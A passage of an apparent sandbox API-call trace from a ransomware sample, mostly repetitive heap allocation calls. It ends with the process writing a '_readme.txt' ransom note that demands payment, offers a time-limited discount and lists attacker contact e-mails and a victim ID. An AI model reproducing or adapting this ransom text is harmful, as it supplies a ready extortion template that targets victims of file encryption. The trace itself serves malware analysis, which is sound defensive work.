out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.809] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.809] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.810] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.811] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.812] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.812] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.813] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.813] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.814] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.814] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.815] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.815] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.815] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0127.815] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.815] PathFindFileNameW (pszPath="") returned="" [0127.815] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.815] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0127.815] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0127.816] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.816] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal 